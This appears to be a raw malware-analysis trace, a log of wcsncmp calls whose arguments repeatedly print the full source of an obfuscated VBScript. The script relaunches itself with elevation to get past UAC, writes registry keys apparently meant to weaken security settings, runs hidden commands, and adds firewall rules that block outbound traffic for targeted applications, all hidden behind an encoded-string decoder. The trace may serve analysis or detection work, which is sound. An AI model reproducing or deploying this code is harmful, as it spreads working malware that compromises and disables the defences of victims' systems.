(fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93 [0223.014] wcsncmp (_String1="ect(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.015] wcsncmp (_String1="ct(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0223.015] wcsncmp (_String1="t(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.015] wcsncmp (_String1="(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0223.015] wcsncmp (_String1="bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra 